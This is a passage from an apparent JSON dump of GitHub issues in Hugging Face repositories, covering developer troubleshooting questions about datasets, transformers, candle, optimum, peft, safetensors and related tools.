3](vscode-notebook-cell:?execution_count=33&line=3)\r\n [1](vscode-notebook-cell:?execution_count=33&line=1) from datasets import load_metric\r\n----> [3](vscode-notebook-cell:?execution_count=33&line=3) metric = load_metric(\"seqeval\")\r\n\r\nFile ~/.local/lib/python3.10/site-packages/datasets/utils/deprecation_utils.py:46, in deprecated..decorator..wrapper(*args, **kwargs)\r\n [44](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/utils/deprecation_utils.py:44) warnings.warn(warning_msg, category=FutureWarning, stacklevel=2)\r\n [45](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/utils/deprecation_utils.py:45) _emitted_deprecation_warnings.add(func_hash)\r\n---> [46](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/utils/deprecation_utils.py:46) return deprecated_function(*args, **kwargs)\r\n\r\nFile ~/.local/lib/python3.10/site-packages/datasets/load.py:2104, in load_metric(path, config_name, process_id, num_process, cache_dir, experiment_id, keep_in_memory, download_config, download_mode, revision, trust_remote_code, **metric_init_kwargs)\r\n [2101](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2101) warnings.filterwarnings(\"ignore\", message=\".*https://huggingface.co/docs/evaluate$\", category=FutureWarning)\r\n [2103](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2103) download_mode = DownloadMode(download_mode or DownloadMode.REUSE_DATASET_IF_EXISTS)\r\n-> [2104](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2104) metric_module = metric_module_factory(\r\n [2105](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2105) path,\r\n [2106](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2106) revision=revision,\r\n [2107](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2107) download_config=download_config,\r\n [2108](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2108) download_mode=download_mode,\r\n [2109](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2109) trust_remote_code=trust_remote_code,\r\n [2110](https://vscode-remote+wsl-002bubuntu-002d22-002e04.vscode-resource.vscode-cdn.net/home/noodle/Transformers-Tutorials/LayoutLMv3/~/.local/lib/python3.10/site-packages/datasets/load.py:2110) ).module_path\r\n [2111](https://vscode-remote+wsl-002bubuntu-002d22-00", "url": "https://github.com/huggingface/datasets/issues/6882", "state": "open", "labels": [], "created_at": "2024-05-08T06:40:14Z", "updated_at": "2024-05-17T06:38:30Z", "comments": 1, "user": "MRNOBODY-ZST" }, { "repo": "huggingface/datatrove", "number": 180, "title": "how to turn log/traceback color off?", "body": "Trying datatrove for the first time and the program spews a bunch of logs and tracebacks in yellow and cyan which are completely unreadable on the b&w console. \r\n\r\nDoes the program make an assumption that the user is using w&b (dark) console?\r\n\r\nI tried to grep for `color` to see how it controls the colors but found nothing relevant, so it's probably some 3rd party component that does that.\r\n\r\nIf the coloring logic doesn't bother to check what the console colors are to keep the output readable, any idea how to turn it off completely? I RTFM'ed - didn't find any docs that address that aspect.\r\n\r\nThanks a lot!", "url": "https://github.com/huggingface/datatrove/issues/180", "state": "closed", "labels": [], "created_at": "2024-05-08T03:51:11Z", "updated_at": "2024-05-17T17:53:20Z", "user": "stas00" }, { "repo": "huggingface/candle", "number": 2171, "title": "How to run LLama-3 or Phi with more then 4096 prompt tokens?", "body": "Could you please show me an example where LLama-3 model used (better GGUF quantized) and initial prompt is more then 4096 tokens long? Or better 16-64K long (for RAG). Currently everything I do ends with error:\r\nIn this code:\r\nlet logits = model.forward(&input, 0); // input is > 4096 tokens\r\n\r\nError:\r\nnarrow invalid args start + len > dim_len: [4096, 64], dim: 0, start: 0, len:4240\r\n\r\nModel used:\r\nhttps://huggingface.co/MaziyarPanahi/Llama-3-8B-Instruct-64k-GGUF\r\n\r\nThank you a lot in advance!", "url": "https://github.com/huggingface/candle/issues/2171", "state": "open", "labels": [], "created_at": "2024-05-07T20:15:28Z", "updated_at": "2024-05-07T20:16:13Z", "user": "baleksey" }, { "repo": "huggingface/chat-ui", "number": 1115, "title": "[v0.8.4] IMPORTANT: Talking to PDFs and general Roadmap?", "body": "Hi @nsarrazin \r\n\r\nI have a couple of questions that I could not get answers to in the repo and on the web.\r\n\r\n1. Is there a plan to enable file uploads (PDFs, etc) so that users can talk to those files? Similar to ChatGPT, Gemini etc? \r\n2. Is there a feature roadmap available somewhere?\r\n\r\nThanks!", "url": "https://github.com/huggingface/chat-ui/issues/1115", "state": "open", "labels": [], "created_at": "2024-05-07T06:10:20Z", "updated_at": "2024-09-10T15:44:16Z", "comments": 4, "user": "adhishthite" }, { "repo": "huggingface/candle", "number": 2167, "title": "How to do a Axum's sse function for Candle?", "body": "fn run(&mut self, prompt: &str, sample_len: usize) -> Result<()> {\r\n use std::io::Write;\r\n self.tokenizer.clear();\r\n let mut tokens = self\r\n .tokenizer\r\n .tokenizer()\r\n .encode(prompt, true)\r\n .map_err(E::msg)?\r\n .get_ids()\r\n .to_vec();\r\n for &t in tokens.iter() {\r\n if let Some(t) = self.tokenizer.next_token(t)? {\r\n print!(\"{t}\")\r\n }\r\n }\r\n std::io::stdout().flush()?;\r\n\r\n let mut generated_tokens = 0usize;\r\n let eos_token = match self.tokenizer.get_token(\"<|endoftext|>\") {\r\n Some(token) => token,\r\n None => anyhow::bail!(\"cannot find the <|endoftext|> token\"),\r\n };\r\n let start_gen = std::time::Instant::now();\r\n for index in 0..sample_len {\r\n let context_size = if index > 0 { 1 } else { tokens.len() };\r\n let start_pos = tokens.len().saturating_sub(context_size);\r\n let ctxt = &tokens[start_pos..];\r\n let input = Tensor::new(ctxt, &self.device)?.unsqueeze(0)?;\r\n let logits = self.model.forward(&input, start_pos)?;\r\n let logits = logits.squeeze(0)?.squeeze(0)?.to_dtype(DType::F32)?;\r\n let logits = if self.repeat_penalty == 1. {\r\n logits\r\n } else {\r\n let start_at = tokens.len().saturating_sub(self.repeat_last_n);\r\n candle_transformers::utils::apply_repeat_penalty(\r\n &logits,\r\n self.repeat_penalty,\r\n &tokens[start_at..],\r\n )?\r\n };\r\n\r\n let next_token = self.logits_processor.sample(&logits)?;\r\n tokens.push(next_token);\r\n generated_tokens += 1;\r\n if next_token == eos_token {\r\n break;\r\n }\r\n if let Some(t) = self.tokenizer.next_token(next_token)? {\r\n print!(\"{t}\");\r\n std::io::stdout().flush()?;\r\n }\r\n }\r\n let dt = start_gen.elapsed();\r\n if let Some(rest) = self.tokenizer.decode_rest().map_err(E::msg)? {\r\n print!(\"{rest}\");\r\n }\r\n std::io::stdout().flush()?;\r\n println!(\r\n \"\\n{generated_tokens} tokens generated ({:.2} token/s)\",\r\n generated_tokens as f64 / dt.as_secs_f64(),\r\n );\r\n Ok(())\r\n }\r\n\r\n\r\nHow to rewrite above function to sse?", "url": "https://github.com/huggingface/candle/issues/2167", "state": "closed", "labels": [], "created_at": "2024-05-07T02:38:50Z", "updated_at": "2024-05-08T04:27:14Z", "user": "sunnyregion" }, { "repo": "huggingface/optimum", "number": 1847, "title": "Static Quantization for Seq2Seq models like T5", "body": "I'm currently trying to static quantize T5 but it seem in the optimum doc last committed 10 months ago said it don't support static only dynamic. Is there anyone ever try this before or has optimum updated any related recently, may be help me take a look?", "url": "https://github.com/huggingface/optimum/issues/1847", "state": "open", "labels": [ "question", "quantization" ], "created_at": "2024-05-06T19:34:30Z", "updated_at": "2024-10-14T12:24:28Z", "user": "NQTri00" }, { "repo": "huggingface/optimum", "number": 1846, "title": "Low performance of THUDM/chatglm3-6b onnx model", "body": "I ran the chatglm3-6b model by exporting it to ONNX framework using custom onnx configuration. Although the functionality is correct, the latency of the model is very high, much higher than the pytorch model. \r\nI have attached a minimal reproducible code which exports and run the model. Can someone take a look into it and suggest how to rectify the performance degradation.\r\n\r\n```\r\nfrom optimum.exporters.onnx import main_export\r\nfrom transformers import AutoConfig\r\n\r\nfrom optimum.exporters.onnx.config import TextDecoderOnnxConfig,TextDecoderWithPositionIdsOnnxConfig\r\nfrom optimum.exporters.onnx.base import ConfigBehavior\r\nfrom optimum.utils import NormalizedTextConfig, DummyPastKeyValuesGenerator\r\nfrom typing import Dict\r\nimport os\r\nimport shutil\r\nimport time\r\n\r\n\r\nclass ChatGLM2DummyPastKeyValuesGenerator(DummyPastKeyValuesGenerator):\r\n\r\n def generate(self, input_name: str, framework: str = \"pt\"):\r\n past_key_shape = (\r\n self.batch_size,\r\n self.num_attention_heads,\r\n self.hidden_size // self.num_attention_heads,\r\n self.sequence_length,\r\n )\r\n past_value_shape = (\r\n self.batch_size,\r\n self.num_attention_heads,\r\n self.sequence_length,\r\n self.hidden_size // self.num_attention_heads,\r\n )\r\n return [\r\n (\r\n self.random_float_tensor(past_key_shape, framework=framework),\r\n self.random_float_tensor(past_value_shape, framework=framework),\r\n )\r\n for _ in range(self.num_layers)\r\n ]\r\n\r\n\r\nclass CustomChatGLM2OnnxConfig(TextDecoderOnnxConfig):\r\n DUMMY_INPUT_GENERATOR_CLASSES = (\r\n ChatGLM2DummyPastKeyValuesGenerator,\r\n ) + TextDecoderOnnxConfig.DUMMY_INPUT_GENERATOR_CLASSES\r\n DUMMY_PKV_GENERATOR_CLASS = ChatGLM2DummyPastKeyValuesGenerator\r\n\r\n DEFAULT_ONNX_OPSET = 15 # aten::tril operator requires opset>=14\r\n NORMALIZED_CONFIG_CLASS = NormalizedTextConfig.with_args(\r\n hidden_size=\"hidden_size\",\r\n num_layers=\"num_layers\",\r\n num_attention_heads=\"num_attention_heads\",\r\n )\r\n\r\n def add_past_key_values(\r\n self, inputs_or_outputs: Dict[str, Dict[int, str]], direction: str\r\n ):\r\n\r\n if direction not in [\"inputs\", \"outputs\"]:\r\n raise ValueError(\r\n f'direction must either be \"inputs\" or \"outputs\", but {direction} was given'\r\n )\r\n\r\n if direction == \"inputs\":\r\n decoder_sequence_name = \"past_sequence_length\"\r\n name = \"past_key_values\"\r\n else:\r\n decoder_sequence_name = \"past_sequence_length + 1\"\r\n name = \"present\"\r\n\r\n for i in range(self._normalized_config.num_layers):\r\n inputs_or_outputs[f\"{name}.{i}.key\"] = {\r\n 0: \"batch_size\",\r\n 3: decoder_sequence_name,\r\n }\r\n inputs_or_outputs[f\"{name}.{i}.value\"] = {\r\n 0: \"batch_size\",\r\n 2: decoder_sequence_name,\r\n }\r\n\r\nmodel_id = \"THUDM/chatglm3-6b\"\r\nconfig = AutoConfig.from_pretrained(model_id, trust_remote_code=True) \r\n\r\nonnx_config = CustomChatGLM2OnnxConfig(\r\n config=config,\r\n task=\"text-generation\",\r\n use_past_in_inputs=False,\r\n )\r\nonnx_config_with_past = CustomChatGLM2OnnxConfig(\r\n config, task=\"text-generation\", use_past=True\r\n )\r\n\r\ncustom_onnx_configs = {\r\n \"model\": onnx_config,\r\n }\r\n\r\nmain_export(\r\n model_id,\r\n output=\"chatglm\",\r\n task=\"text-generation-with-past\",\r\n trust_remote_code=True,\r\n custom_onnx_configs=custom_onnx_configs,\r\n no_post_process=True,\r\n opset=15\r\n)\r\n\r\n### Running \r\n\r\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\r\nfrom optimum.utils import NormalizedTextConfig, NormalizedConfigManager\r\nNormalizedConfigManager._conf[\"chatglm\"] = NormalizedTextConfig\r\n\r\nimport torch\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(model_id, trust_remote_code=True)\r\ntokenizer.add_special_tokens({\"pad_token\": \"[PAD]\"})\r\nmodel = AutoModelForCausalLM.from_pretrained(model_id, trust_remote_code=True)\r\n\r\nstart = time.perf_counter()\r\n\r\ninputs = tokenizer(\"What is the meaning of life?\", return_tensors=\"pt\", padding=True)\r\ninput_ids = inputs.input_ids\r\n\r\n# Generate\r\ngenerate_ids = model.generate(\r\n input_ids,\r\n max_length=64,\r\n pad_token_id=tokenizer.eos_token_id,\r\n )\r\n\r\n \r\n# Stop timer\r\nend = time.perf_counter()\r\ngenerate_time = end - start\r\n\r\n# Num of tokens\r\nprompt_tokens = input_ids.shape[1]\r\nnum_tokens_out = generate_ids.shape[1]\r\nnew_tokens_generated = num_tokens_out - prompt_tokens\r\n\r\ntime_per_token = (generate_time / new_tokens_generated) * 1e3\r\n\r\nprint(time_per_token)\r\n\r\n```", "url": "https://github.com/huggingface/optimum/issues/1846", "state": "open", "labels": [ "inference", "onnxruntime", "onnx" ], "created_at": "2024-05-06T17:18:58Z", "updated_at": "2024-10-14T12:25:29Z", "comments": 0, "user": "tuhinp-amd" }, { "repo": "huggingface/dataset-viewer", "number": 2775, "title": "Support LeRobot datasets?", "body": "Currently:\r\n\r\n```\r\nError code: ConfigNamesError\r\nException: ValueError\r\nMessage: Feature type 'VideoFrame' not found. Available feature types: ['Value', 'ClassLabel', 'Translation', 'TranslationVariableLanguages', 'Sequence', 'Array2D', 'Array3D', 'Array4D', 'Array5D', 'Audio', 'Image']\r\n```\r\n\r\neg on https://huggingface.co/datasets/lerobot/aloha_static_towel\r\n\r\nRequires datasets to support `VideoFrame`", "url": "https://github.com/huggingface/dataset-viewer/issues/2775", "state": "open", "labels": [ "question", "feature request", "dependencies", "P2" ], "created_at": "2024-05-06T09:16:40Z", "updated_at": "2025-07-24T03:36:41Z", "user": "severo" }, { "repo": "huggingface/peft", "number": 1712, "title": "how to finetune whisper model with 'initial_prompt'", "body": "when use 'initial_prompt', the decoding result of finetuning with my data on whisper model v2 is bad, on the contrary, the result is good.\r\nhowever, when use 'initial_prompt' the decoding result of based whisper model v2 is also good, so it means If want to use 'initial_prompt' during decoding , must add it when training\uff1f", "url": "https://github.com/huggingface/peft/issues/1712", "state": "closed", "labels": [], "created_at": "2024-05-06T06:28:20Z", "updated_at": "2024-06-13T15:03:43Z", "user": "zyb8543d" }, { "repo": "huggingface/dataspeech", "number": 17, "title": "UnboundLocalError: cannot access local variable 't' where it is not associated with a value \"\"\"", "body": "### What i do\r\n\r\n\r\nHello. I tried to annotate my own dataset. And I got an error that I don't understand.\r\nI'm a newbie. He is generally unable to understand what happened and why it happened.\r\n\r\nI am attaching all the materials that I have\r\n\r\nI have CSV-Scheme\r\n\r\n| audio | text | speeker_id |\r\n| ------------- | ------------- | ------------- |\r\n| ./audio/audio_427.wav | \u0422\u0435\u043a\u0441\u0442 \u043d\u0430 \u043a\u0438\u0440\u0438\u043b\u043b\u0438\u0446\u0435 | 1111 |\r\n\r\n\r\nI upload CSV and cast csv as written in the documentation.\r\nUploading to HgFace. I start dataspeech with arguments.\r\nHe loaded it, he started doing something, and then that was it.\r\n\r\n### What i group dataset\r\n\r\n```sh\r\npython group_dataset.py from_audio to_csv\r\n```\r\n\r\nOut. It save datasets.csv:\r\n\r\n```csv\r\n./audio/audio_427.wav, \u0430 \u0437\u0430\u0442\u0435\u043c \u0431\u0430\u0437\u0430\u043b\u044c\u0442\u0430!. ,1111\r\n./audio/audio_231.wav, razus!. ,1111\r\n```\r\n\r\n#### Cast and upload dataset to HG\r\n\r\n```sh\r\npython group_dataset.py from_csv cast_audio push_to_hub\r\n```\r\n\r\n```py\r\n# In short it does this >\r\n\r\ndf = Dataset.from_csv(\"./datasets.csv\")\r\ndf = df.cast_column(\"audio\", Audio(32000))\r\ndf.push_to_hub(repo_id=\"\", token=\"\")\r\n```\r\n\r\n### Start dataspeach\r\n\r\n```sh\r\npython main.py \"Anioji/testra\" \\\r\n--configuration \"default\" \\\r\n--output_dir /root/dataspeech/tmp_stone_base/ \\\r\n--text_column_name \"text_original\" \\\r\n--audio_column_name \"audio\" \\\r\n--cpu_num_workers 4 \\\r\n--num_workers_per_gpu 4 \\\r\n--rename_column \\\r\n```\r\n\r\n### Tracelog\r\n\r\n```pyhon\r\n/root/dataspeech/venv/lib/python3.11/site-packages/pyannote/audio/core/io.py:43: UserWarning: torchaudio._backend.set_audio_backend has been deprecated. With dispatcher enabled, this function is no-op. You can remove the function call.\r\n torchaudio.set_audio_backend(\"soundfile\")\r\nWARNING - torchvision is not available - cannot save figures\r\nCompute speaking rate\r\nCompute snr and reverb\r\nMap (num_proc=4): 0%| | 0/534 [00:00>> ds = load_dataset(\"google/fleurs\")\r\nValueError: Config name is missing.\r\nPlease pick one among the available configs: ['af_za', 'am_et', 'ar_eg', 'as_in', 'ast_es', 'az_az', 'be_by', 'bg_bg', 'bn_in', 'bs_ba', 'ca_es', 'ceb_ph', 'ckb_iq', 'cmn_hans_cn', 'cs_cz', 'cy_gb', 'da_dk', 'de_de', 'el_gr', 'en_us', 'es_419', 'et_ee', 'fa_ir', 'ff_sn', 'fi_fi', 'fil_ph', 'fr_fr', 'ga_ie', 'gl_es', 'gu_in', 'ha_ng', 'he_il', 'hi_in', 'hr_hr', 'hu_hu', 'hy_am', 'id_id', 'ig_ng', 'is_is', 'it_it', 'ja_jp', 'jv_id', 'ka_ge', 'kam_ke', 'kea_cv', 'kk_kz', 'km_kh', 'kn_in', 'ko_kr', 'ky_kg', 'lb_lu', 'lg_ug', 'ln_cd', 'lo_la', 'lt_lt', 'luo_ke', 'lv_lv', 'mi_nz', 'mk_mk', 'ml_in', 'mn_mn', 'mr_in', 'ms_my', 'mt_mt', 'my_mm', 'nb_no', 'ne_np', 'nl_nl', 'nso_za', 'ny_mw', 'oc_fr', 'om_et', 'or_in', 'pa_in', 'pl_pl', 'ps_af', 'pt_br', 'ro_ro', 'ru_ru', 'sd_in', 'sk_sk', 'sl_si', 'sn_zw', 'so_so', 'sr_rs', 'sv_se', 'sw_ke', 'ta_in', 'te_in', 'tg_tj', 'th_th', 'tr_tr', 'uk_ua', 'umb_ao', 'ur_pk', 'uz_uz', 'vi_vn', 'wo_sn', 'xh_za', 'yo_ng', 'yue_hant_hk', 'zu_za', 'all']\r\nExample of usage:\r\n\t`load_dataset('fleurs', 'af_za')`\r\n```\r\n\r\nNote the example of usage in the error message suggests loading \"fleurs\" instead of \"google/fleurs\".", "url": "https://github.com/huggingface/datasets/issues/6854", "state": "closed", "labels": [ "bug" ], "created_at": "2024-05-02T06:59:39Z", "updated_at": "2024-05-03T15:51:59Z", "comments": 0, "user": "albertvillanova" }, { "repo": "huggingface/distil-whisper", "number": 130, "title": "How to set the target language for examples in README?", "body": "The code examples in the README do not make it obvious how to set the language of the audio to transcribe. \r\n\r\nThe default settings create garbled english text if the audio language is different.", "url": "https://github.com/huggingface/distil-whisper/issues/130", "state": "open", "labels": [], "created_at": "2024-05-01T11:52:00Z", "updated_at": "2024-05-22T11:59:09Z", "user": "clstaudt" }, { "repo": "huggingface/transformers", "number": 30596, "title": "AutoModal how to enable TP for extremly large models?", "body": "Hi, I have 8V100s, but a single one can not fit InternVL1.5 model which has 28B parameters.\r\n\r\nSo that, I just wonder if I can fit all of them into 8 V100 with TP?\r\n\r\nI found that Deepspeed can be used to do tensor parallel like this:\r\n\r\n```\r\n# create the model\r\nif args.pre_load_checkpoint:\r\n model = model_class.from_pretrained(args.model_name_or_path)\r\nelse:\r\n model = model_class()\r\n...\r\n\r\nimport deepspeed\r\n\r\n# Initialize the DeepSpeed-Inference engine\r\nds_engine = deepspeed.init_inference(model,\r\n tensor_parallel={\"tp_size\": 2},\r\n dtype=torch.half,\r\n checkpoint=None if args.pre_load_checkpoint else args.checkpoint_json,\r\n replace_with_kernel_inject=True)\r\nmodel = ds_engine.module\r\noutput = model('Input String')\r\n```\r\n\r\nI didn't succeed because of it just support built in model which can be imported, but for custom model which have to `fromPretrained` it does support.\r\n\r\nBut as I mentioned at start, my V100 will OOM when load model.\r\n\r\nDoes there any convenient way to loading hf model which is customized with tp enable ?", "url": "https://github.com/huggingface/transformers/issues/30596", "state": "closed", "labels": [], "created_at": "2024-05-01T10:06:45Z", "updated_at": "2024-06-09T08:03:23Z", "user": "MonolithFoundation" }, { "repo": "huggingface/transformers", "number": 30595, "title": "i cannot find the code that transformers trainer model_wrapped by deepspeed , i can find the theory about model_wrapped was wraped by DDP(Deepspeed(transformer model )) ,but i only find the code transformers model wrapped by ddp, where is the deepspeed wrapped ? thanks ^-^ ", "body": "### System Info\n\ni cannot find the code that transformers trainer model_wrapped by deepspeed , i can find the theory about model_wrapped was wraped by DDP(Deepspeed(transformer model )) ,but i only find the code transformers model wrapped by ddp, where is the deepspeed wrapped ? thanks ^-^ \n\n### Who can help?\n\ni cannot find the code that transformers trainer model_wrapped by deepspeed , i can find the theory about model_wrapped was wraped by DDP(Deepspeed(transformer model )) ,but i only find the code transformers model wrapped by ddp, where is the deepspeed wrapped ? thanks ^-^ \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\ni cannot find the code that transformers trainer model_wrapped by deepspeed , i can find the theory about model_wrapped was wraped by DDP(Deepspeed(transformer model )) ,but i only find the code transformers model wrapped by ddp, where is the deepspeed wrapped ? thanks ^-^ \n\n### Expected behavior\n\ni cannot find the code that transformers trainer model_wrapped by deepspeed , i can find the theory about model_wrapped was wraped by DDP(Deepspeed(transformer model )) ,but i only find the code transformers model wrapped by ddp, where is the deepspeed wrapped ? thanks ^-^ ", "url": "https://github.com/huggingface/transformers/issues/30595", "state": "closed", "labels": [], "created_at": "2024-05-01T09:17:58Z", "updated_at": "2024-05-01T09:31:39Z", "user": "ldh127" }, { "repo": "huggingface/transformers.js", "number": 732, "title": "What does \"Error: failed to call OrtRun(). error code = 6.\" mean? I know it is ONNX related, but how to fix?", "body": "### Question\n\nI keep running into the same issue when using transformers.js Automatic Speech Recognition pipeline. I've tried solving it multiple ways. But pretty much hit a wall every time. I've done lots of googling, LLMs, and used my prior knowledge of how this stuff functions in python. But I can't seem to get it to work.\r\n\r\nI've tried setting up my environment with and without vite. I've tried with react javascript. I've tried with with react typescript. Nothing.\r\n\r\nAm i missing a dependency or something? is there a place I can find what the error code means? because I couldn't find it anywhere.\r\n\r\nI've fed it an array. I've fed it a .wav file. Nothing works. No matter what I do. No matter if it's an array or a wav file. I always get the same error:\r\n```\r\nAn error occurred during model execution: \"Error: failed to call OrtRun(). error code = 6.\".\r\nInputs given to model: {input_features: Proxy(Tensor)}\r\nError transcribing audio: Error: failed to call OrtRun(). error code = 6.\r\n at e.run (wasm-core-impl.ts:392:1)\r\n at e.run (proxy-wrapper.ts:212:1)\r\n at e.OnnxruntimeWebAssemblySessionHandler.run (session-handler.ts:99:1)\r\n at InferenceSession.run (inference-session-impl.ts:108:1)\r\n at sessionRun (models.js:207:1)\r\n at encoderForward (models.js:520:1)\r\n at Function.seq2seqForward [as _forward] (models.js:361:1)\r\n at Function.forward (models.js:820:1)\r\n at Function.seq2seqRunBeam [as _runBeam] (models.js:480:1)\r\n at Function.runBeam (models.js:1373:1)\r\n ```\r\n \r\nIt seems to be a ONNX Runtime issue. But don't know how to fix it. Any guidance will be appreciated.\r\n\r\nNote: I'm currently testing with English. Nothing fancy.", "url": "https://github.com/huggingface/transformers.js/issues/732", "state": "closed", "labels": [ "question" ], "created_at": "2024-05-01T07:01:06Z", "updated_at": "2024-05-11T09:18:35Z", "user": "jquintanilla4" }, { "repo": "huggingface/transformers", "number": 30591, "title": "i cannot find the code that transformers trainer model_wrapped by deepspeed , i can find the theory about model_wrapped was wraped by DDP(Deepspeed(transformer model )) ,but i only find the code transformers model wrapped by ddp, where is the deepspeed wrapped ? thanks ^-^ ", "body": "### Feature request\r\n\r\ni cannot find the code that transformers trainer model_wrapped by deepspeed , i can find the theory about model_wrapped was wraped by DDP(Deepspeed(transformer model )) ,but i only find the code transformers model wrapped by ddp, where is the deepspeed wrapped ? thanks ^-^ \r\n\r\n### Motivation\r\n\r\nx\r\n\r\n### Your contribution\r\n\r\nx", "url": "https://github.com/huggingface/transformers/issues/30591", "state": "closed", "labels": [], "created_at": "2024-05-01T04:27:47Z", "updated_at": "2024-06-08T08:03:17Z", "user": "ldh127" }, { "repo": "huggingface/chat-ui", "number": 1093, "title": "I want to get the html of a website https://bit.ly/4bgmLb9 in huggingchat web search", "body": "I want to get the html of a website https://bit.ly/4bgmLb9 in hugging-chat web search. In chrome, I can put https://bit.ly/4bgmLb9 in the address bar and get the result. But I do not know how to do that in hugging-chat web search?\r\n\r\nI try in hugging-chat and the screenshot \r\n![tmp](https://github.com/huggingface/chat-ui/assets/124528204/89ca5f28-9dc9-479c-a6f0-9c096e8ea0d6)\r\n\r\nhow to write the prompt so that huggingchat can fullfill the requirement", "url": "https://github.com/huggingface/chat-ui/issues/1093", "state": "closed", "labels": [], "created_at": "2024-05-01T03:00:29Z", "updated_at": "2024-05-02T14:26:16Z", "comments": 1, "user": "ghost" }, { "repo": "huggingface/dataset-viewer", "number": 2756, "title": "Upgrade pyarrow to 16?", "body": "Release notes here: https://arrow.apache.org/blog/2024/04/20/16.0.0-release/\r\n\r\nAre we affected by any change? Does it enable something for us?", "url": "https://github.com/huggingface/dataset-viewer/issues/2756", "state": "open", "labels": [ "question", "dependencies", "P2" ], "created_at": "2024-04-30T10:20:45Z", "updated_at": "2024-04-30T16:19:31Z", "user": "severo" }, { "repo": "huggingface/peft", "number": 1693, "title": "How to convert a loha safetensor trained from diffusers to webui format", "body": "Hello, when I finetune SDXL (actually that is InstantID) with PEFT method, I use lora\u3001loha and lokr for PEFT in [diffuser](https://github.com/huggingface/diffusers).\r\nI have a question, how to convert a loha safetensor trained from diffusers to webui format\uff1f\r\nIn the training process:\r\nthe loading way:\r\n`peft_config = LoHaConfig(\r\n r=args.rank,\r\n alpha=args.rank //2,\r\n target_modules=[\"to_k\", \"to_q\", \"to_v\", \"to_out.0\"],\r\n ) `\r\n`unet = get_peft_model(unet, peft_config)\r\n`\r\nwhen train process finished, the saving way as:\r\n`unet.save_pretrained(args.output_dir)`\r\n\r\nand I get the safetensor as\r\n![image](https://github.com/KohakuBlueleaf/LyCORIS/assets/61881733/f71caa9a-4935-40f8-84fb-0a18d19991ac)\r\n\r\nBut [webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui/) can't recognize it, I can't use it in webui.\r\n\r\nHow can I fix this promblem!\r\n", "url": "https://github.com/huggingface/peft/issues/1693", "state": "closed", "labels": [], "created_at": "2024-04-30T07:17:48Z", "updated_at": "2024-06-08T15:03:44Z", "user": "JIAOJIAYUASD" }, { "repo": "huggingface/safetensors", "number": 474, "title": "How to fully load checkpointed weights in memory? ", "body": "### System Info\r\n\r\n\r\n- `transformers` version: 4.40.0\r\n- Platform: Linux-5.15.0-105-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.22.2\r\n- Safetensors version: 0.4.1\r\n- Accelerate version: 0.25.0\r\n- Accelerate config: not found\r\n- PyTorch version (GPU?): 2.2.2+cu121 (True)\r\n- Tensorflow version (GPU?): 2.16.1 (True)\r\n- Flax version (CPU?/GPU?/TPU?): 0.8.2 (cpu)\r\n- Jax version: 0.4.26\r\n- JaxLib version: 0.4.21\r\n\r\n### Reproduction\r\n\r\n1. Load a checkpointed `.safetensor` file using `safetensors.torch.load_file` API in the CPU memory. \r\n2. Negligible increase in the CPU memory usage\r\n\r\n### Expected behavior\r\n\r\nThe CPU memory should increase by exactly the size of the file being read. \r\n\r\nI think the negligible increase in the CPU memory might be the expected behavior, due to safetensors' lazy loading feature? However if I want to load the entire model in host memory, is there another way to do that? I am running some benchmarks with safetensor APIs, and need to ensure that the model is fully loaded in the CPU memory. ", "url": "https://github.com/huggingface/safetensors/issues/474", "state": "closed", "labels": [], "created_at": "2024-04-29T21:30:37Z", "updated_at": "2024-04-30T22:12:29Z", "user": "goelayu" }, { "repo": "huggingface/dataset-viewer", "number": 2754, "title": "Return partial dataset-hub-cache instead of error?", "body": "`dataset-hub-cache` depends on multiple previous steps, and any error in one of them makes it fail. It provokes things like https://github.com/huggingface/moon-landing/issues/9799 (internal): in the datasets list, a dataset is not marked as \"supporting the dataset viewer\", whereas the only issue is that we didn't manage to list the compatible libraries, to create the tags.\r\n\r\nhttps://github.com/huggingface/dataset-viewer/blob/main/services/worker/src/worker/job_runners/dataset/hub_cache.py\r\n\r\nIn this case, we could return a partial response, or maybe return an empty list of libraries or modalities if we have an error.\r\n\r\nWhat do you think @lhoestq?\r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/2754", "state": "closed", "labels": [ "question", "P2" ], "created_at": "2024-04-29T17:10:09Z", "updated_at": "2024-06-13T13:57:20Z", 